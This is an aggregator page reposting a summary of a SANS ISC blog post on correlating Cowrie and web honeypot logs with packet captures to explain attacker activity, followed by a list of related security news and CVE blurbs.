CyberSecurityBoard
Sponsor Register Login

Is that It? Finding the Unknown: Correlations Between Honeypot Logs & PCAPs

Simply parsing through the logs may not always give you a complete picture either.
This blog post will walk through the steps I have taken to build a bigger picture to make an attack observation, briefly going over various attacks such as malicious files, HTTP requests, Cowrie/Webhoneypot JSON logs and PCAPs.
Reviewing the cowrie JSON logs pulls everything with all relevant details for each IP address into a format I feel is a bit easier to follow.
Some data may not always populate on the SIEM, so it isn't a bad idea to review the logs from the honeypot to confirm.
You could also parse through the logs manually to get similar data.
For me, reviewing these requests on the SIEM or parsing through the logs still didn't answer why.
Since the SIEM wasn't cutting it for me with web requests, I turned to the logs from the sensors to manually parse.
Parsing the logs reveals a lot of details about an IP address or even web requests.
Once you understand the structure of the JSON files, it is simple to parse the logs based on just about any search criteria.
Aside from manually parsing the files like the TELNET/SSH logs, I created a script specific to the format for these logs.
While the web logs provide a lot of details, this goes back to what I mentioned earlier about something still seemed to be missing and answering the question of why these are being accessed.
Having a honeypot running provides only so much insight into what a threat actor is doing just by reviewing the logs.
What you don't get with the web logs from the honeypot is any inclination of what the threat actor may be doing - at least not from what I was able to observe.
Going back to how Daemonlogger is setup, it logs one PCAP file to a daily folder.
Parsing through the honeypot logs, I couldn't find any correlation of that command.
Without it, all you would find in the logs is that the HTTP request method is POST and URL is /device.
If you didn't catch the details regarding data retention on the sensor at the start of the internship, the logs are deleted at certain intervals.
If you want to retain logs, set up an automatic way to transfer the logs to a separate system or a separate folder on the sensor.
My first or second attack observation included some logs that just so happen to be at the tail end of when they are deleted.
If you want long-term data retention for any of the logs, transfer the logs to another folder or system.


This Cyber News was published on isc.sans.edu. Publication date: Wed, 29 May 2024 01:13:14 +0000


Cyber News related to Is that It? Finding the Unknown: Correlations Between Honeypot Logs & PCAPs

Is that It? Finding the Unknown: Correlations Between Honeypot Logs & PCAPs - Simply parsing through the logs may not always give you a complete picture either. This blog post will walk through the steps I have taken to build a bigger picture to make an attack observation, briefly going over various attacks such as malicious ...
1 month ago Isc.sans.edu
Flask Web App: Smart Honeypot Deployment With RL - The goal of a honeypot is to deceive attackers into interacting with them, enabling security experts to observe and analyze their behavior. By applying RL, we can develop a smart honeypot deployment system that learns and adapts to emerging threats ...
3 days ago Feeds.dzone.com
Empowering Global Cybersecurity: The Future with Dianoea Darwis Honeypot - The challenges posed by cyber threats are too vast for any single entity to tackle alone. The Foundation's initiative highlights the importance of collaboration in cybersecurity. By providing tools like the Dianoea Darwis Honeypot and its analysis ...
5 months ago Cysecurity.news
Auditing Kubernetes with Open Source SIEM and XDR - Container technology has gained traction among businesses due to the increased efficiency it provides. In this regard, organizations widely use Kubernetes for deploying, scaling, and managing containerized applications. Organizations should audit ...
1 year ago Thehackernews.com
What Setting Live Traps for Cybercriminals Taught Me About Security - The Storm Center is a worldwide network of honeypots that are set up and monitored by volunteers. For anyone who doesn't know what a honeypot is, it is a server created specifically for the purpose of gathering information about unauthorized users ...
1 week ago Isc.sans.edu
6 Best Anonymous VPNs for 2024 - VPNs are primarily used to secure online traffic and help users remain anonymous to avoid targeted ads, hide their location or ensure the security and privacy of their personal data. Though many VPN providers may advertise having a no-logs policy, ...
5 months ago Techrepublic.com
5 Lessons Learned from Windows Remote Desktop Honeypot Report - Recently, the SANS Institute released their annual Windows Remote Desktop Honeypot Report, providing comprehensive insights into the nature of malicious activity in a Windows environment. In order to understand how your own Windows network can be ...
1 year ago Bleepingcomputer.com
Mallox Ransomware Deployed Via MS-SQL Honeypot Attack - A recent incident involving an MS-SQL honeypot has shed light on the sophisticated tactics employed by cyber-attackers relying on Mallox ransomware. The honeypot, set up by the Sekoia research team, was targeted by an intrusion set utilizing ...
1 month ago Infosecurity-magazine.com
Microsoft fixes critical Azure CLI flaw that leaked credentials in logs - Microsoft has fixed a critical security vulnerability that could let attackers steal credentials from GitHub Actions or Azure DevOps logs created using Azure CLI. The vulnerability was reported by security researchers with Palo Alto's Prisma Cloud. ...
7 months ago Bleepingcomputer.com
InfectedSlurs Botnet Spreads Mirai via Zero-Days - The payload targets routers and network video recorder devices with default admin credentials and installs Mirai variants when successful. Until November 9, 2023, the vulnerable devices being targeted were unknown. Since both the name and the version ...
7 months ago Akamai.com
Is the vCISO model right for your business? - It's getting harder to justify not having a CISO, so many businesses that have never had a CISO are filling the gap with a virtual CISO. A vCISO, sometimes referred to as a fractional CISO or CISO-as-a-Service, is typically a part-time outsourced ...
6 months ago Darkreading.com
Using Falco to Create Custom Identity Detections - Recent months have witnessed a surge in attacks targeting popular identity providers like Okta, underscoring the critical need for timely and effective detection capabilities. Open-source Falco offers a Dedicated plugin for the Okta identity ...
7 months ago Feeds.dzone.com
CVE-2024-24933 - Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Prasidhda Malla Honeypot for WP Comment allows Reflected XSS.This issue affects Honeypot for WP Comment: from n/a through 2.2.3. ...
4 months ago
CVE-2024-29091 - Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Dnesscarkey WP Armour – Honeypot Anti Spam allows Reflected XSS.This issue affects WP Armour – Honeypot Anti Spam: from n/a through ...
3 months ago
CVE-2024-1350 - Missing Authorization vulnerability in Prasidhda Malla Honeypot for WP Comment.This issue affects Honeypot for WP Comment: from n/a through 2.2.3. ...
2 months ago
CVE-2023-45009 - Improper Restriction of Excessive Authentication Attempts vulnerability in Forge12 Interactive GmbH Captcha/Honeypot for Contact Form 7 allows Functionality Bypass.This issue affects Captcha/Honeypot for Contact Form 7: from n/a through 1.11.3. ...
1 month ago
Cyber Criminals Exploiting MS-SQL Severs To Deploy Mallox Ransomware - The MS-SQL honeypot incident that took place recently highlighted the sophisticated strategies used by cybercriminals that rely on the Mallox ransomware. The honeypot, set up by the Sekoia researchers, was targeted by an intrusion set employing ...
1 month ago Cysecurity.news
Comprehensive Guide to Fraud Detection, Management, & Analysis - To mitigate risks, businesses can use risk management strategies, including fraud detection software, company policies, and staff ranging from risk managers and trust officers to fraud analysts. Affiliate Fraud - Affiliates in a marketing arrangement ...
6 months ago Securityboulevard.com
CVE-2018-14995 - The ZTE Blade Vantage Android device with a build fingerprint of ZTE/Z839/sweet:7.1.1/NMF26V/20180120.095344:user/release-keys, the ZTE Blade Spark Android device with a build fingerprint of ...
5 years ago
CVE-2020-5414 - VMware Tanzu Application Service for VMs (2.7.x versions prior to 2.7.19, 2.8.x versions prior to 2.8.13, and 2.9.x versions prior to 2.9.7) contains an App Autoscaler that logs the UAA admin password. This credential is redacted on VMware Tanzu ...
3 years ago
CVE-2021-28131 - Impala sessions use a 16 byte secret to verify that the session is not being hijacked by another user. However, these secrets appear in the Impala logs, therefore Impala users with access to the logs can use another authenticated user's sessions ...
1 year ago
Microsoft extends Purview Audit log retention after July breach - Microsoft is extending Purview Audit log retention as promised after the Chinese Storm-0558 hacking group breached dozens of Exchange and Microsoft 365 corporate and government accounts in July. The list of affected organizations included government ...
7 months ago Bleepingcomputer.com
Implementing container security best practices using Wazuh - This article will explore how Wazuh helps implement best security practices for containerized environments. Wazuh is a free, open source security platform that offers unified XDR and SIEM capabilities across workloads in cloud and on-premises ...
2 months ago Bleepingcomputer.com
Microsoft Defender for Endpoint is Integrated with Check Point Horizon XDR/XPR - Microsoft Defender for Endpoint integrates with Check Point's extended detection and response solution - Horizon XDR/XPR. One-click integration connects the endpoint solution and telemetry is added to the XDR/XPR artificial intelligence driven data ...
6 months ago Blog.checkpoint.com
Thousands of Young People Told Us Why the Kids Online Safety Act Will Be Harmful to Minors - How young people feel about the Kids Online Safety Act matters. These comments show that thoughtful young people are deeply concerned about the proposed law's fallout, and that many who would be affected think it will harm them, not help them. In ...
3 months ago Eff.org

Latest Cyber News


Cyber Trends (last 7 days)


Trending Cyber News (last 7 days)